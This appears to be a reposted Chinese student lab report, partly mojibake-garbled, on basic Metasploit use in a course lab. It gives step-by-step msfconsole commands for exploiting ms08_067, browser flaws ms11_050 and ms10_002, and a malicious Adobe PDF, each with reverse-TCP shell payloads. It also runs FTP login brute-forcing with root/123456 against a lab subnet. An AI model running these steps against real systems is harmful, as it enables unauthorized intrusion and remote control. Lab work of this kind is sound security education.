20155227《网络对抗》Exp5 MSF基础应用
20155227《網(wǎng)絡(luò)對(duì)抗》Exp5 MSF基礎(chǔ)應(yīng)用
基礎(chǔ)問(wèn)題回答
用自己的話解釋什么是exploit,payload,encode
exploit:把實(shí)現(xiàn)設(shè)置好的東西送到要攻擊的主機(jī)里。
payload:用來(lái)攻擊的代碼、程序等。
encode:編碼方式,讓被傳輸?shù)臇|西變得更不易被發(fā)現(xiàn)。
實(shí)驗(yàn)步驟
1.主動(dòng)攻擊:ms08_067
- 首先,先用search ms08_067查詢(xún)一下針對(duì)該漏洞的攻擊模塊:
- 用use exploit/windows/smb/ms08_067_netapi使用該模塊
- 輸入命令show payloads會(huì)顯示出有效的攻擊載荷
- 使用命令set payload generic/shell_reverse_tcp設(shè)置攻擊有效載荷
- 輸入命令set LHOST "kali Ip" set RHOST "Win xp Ip"
- 使用命令show options查看payload狀態(tài)
- 輸入命令exploit開(kāi)始攻擊,攻擊成功
- 在kali上執(zhí)行ipconfig/all:
- 在win xp上執(zhí)行ipconfig/all:
發(fā)現(xiàn)二者結(jié)果相同,說(shuō)明成功攻擊.
還可以進(jìn)行MS08_067遠(yuǎn)程漏洞攻擊實(shí)踐:meterpreter:
2.對(duì)瀏覽器攻擊:MS11_050漏洞滲透攻擊/MS10-002漏洞攻擊
- 先利用search ms11_050指令查看可以運(yùn)用的攻擊模塊
- 使用use windows/browser/ms11_050_mshtml_cobjectelement模塊:
- 用info查看該模塊的信息:
- 用set payload windows/meterpreter/reverse_tcp設(shè)置payload,并設(shè)置需要設(shè)置的參數(shù)。
- 用show options確認(rèn)需要設(shè)置的參數(shù)是否已經(jīng)設(shè)置好:
- 確認(rèn)參數(shù)設(shè)置無(wú)誤后,用exploit指令開(kāi)始攻擊,攻擊成功后會(huì)有靶機(jī)需要訪問(wèn)的網(wǎng)址:
- 在靶機(jī)IE上輸入該網(wǎng)址出現(xiàn)404not found的錯(cuò)誤:
因?yàn)榘袡C(jī)上的IE版本不符合可攻擊的版本,所以無(wú)法攻擊成功。
之后換成了狄惟佳同學(xué)提供的IE,在IE中輸入網(wǎng)址,查看內(nèi)容:
但是很快,IE出現(xiàn)彈窗,警告遇到問(wèn)題需關(guān)閉程序。
之后我又嘗試了win7下的IE8,也是同樣的結(jié)果,一輸入網(wǎng)址IE就自動(dòng)關(guān)閉。參考了狄同學(xué)的博客,修改了IE的安全設(shè)置,結(jié)果還是不行。
- 我又嘗試了成功攻擊的同學(xué)使用的方法:MS10-002漏洞攻擊,同樣設(shè)置參數(shù)后exploit,在靶機(jī)IE中輸入網(wǎng)址,此時(shí)kali中可以看到有目標(biāo)主機(jī)上線,會(huì)話建立。
- 輸入sessions -i 1,成功獲取靶機(jī)的shell,可以對(duì)其進(jìn)行操作:
3.針對(duì)客戶(hù)端的攻擊:adobe_toolbutton
- 在kali終端中開(kāi)啟msfconsole
- 輸入命令use exploit/windows/fileformat/adobe_cooltype_sing,進(jìn)入該漏洞模塊的使用
- 使用命令set payload windows/meterpreter/reverse_tcp設(shè)置攻擊有效載荷
- 設(shè)置相關(guān)數(shù)據(jù):
- show options:
- 輸入exploit,生成pdf文件,并可以看到pdf所在文件夾,將pdf復(fù)制到靶機(jī)里:
- 使用use exploit/multi/handler新建監(jiān)聽(tīng)模塊(和前幾次實(shí)驗(yàn)一樣)
- 使用命令exploit開(kāi)始攻擊,在靶機(jī)中打開(kāi)pdf,攻擊成功:
4.成功應(yīng)用任何一個(gè)輔助模塊
4.1 scanner/http/dir_scanner
- 用show auxiliary查看所有輔助模塊,并選擇其中的一個(gè),我使用的是scanner/http/dir_scanner掃描網(wǎng)站目錄。
- 查看需要設(shè)置的參數(shù),設(shè)置完成后確認(rèn)一下,然后就可以開(kāi)始exploit了:
- 可以進(jìn)行對(duì)單一目標(biāo)主機(jī)的掃描,也可以對(duì)指定網(wǎng)段的主機(jī)進(jìn)行掃描:
4.2 auxiliary/scanner/ftp/ftp_login
- 選擇ftp_login模塊,掃描網(wǎng)段192.168.115.1-10中能使用固定用戶(hù)名和密碼root/123456登陸主機(jī):
- 查看輸出結(jié)果,可以看出在這10個(gè)IP中沒(méi)有FTP Server使用root/123456賬號(hào)登陸。通常在公司或?qū)W校內(nèi)網(wǎng)里,很多人習(xí)慣使用簡(jiǎn)單的賬號(hào),沒(méi)有足夠的安全意識(shí),當(dāng)攻擊者成功入侵內(nèi)網(wǎng)后,這些工作站將非常危險(xiǎn)。
離實(shí)戰(zhàn)還缺些什么技術(shù)或步驟?
實(shí)戰(zhàn)的時(shí)候要結(jié)合靶機(jī)的具體環(huán)境考慮。
實(shí)驗(yàn)體會(huì)
Metasploit提供了豐富的掃描功能、攻擊腳本及二次開(kāi)發(fā)的平臺(tái),使網(wǎng)絡(luò)安全漏洞檢測(cè)變得相對(duì)容易。在這次實(shí)驗(yàn)過(guò)程中我走的彎路較少。具體來(lái)說(shuō)就是先尋找可攻擊的漏洞、再根據(jù)漏洞名和所屬目錄猜測(cè)漏洞攻擊的方面、再查看漏洞的詳細(xì)信息、再設(shè)置一系列參數(shù)、最后實(shí)施攻擊并查看攻擊結(jié)果。
轉(zhuǎn)載于:https://www.cnblogs.com/guyanlin/p/8876851.html
總結(jié)
以上是生活随笔為你收集整理的20155227《网络对抗》Exp5 MSF基础应用的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 电路分析-1
- 下一篇: oracle 添加登陆数据库触发器--记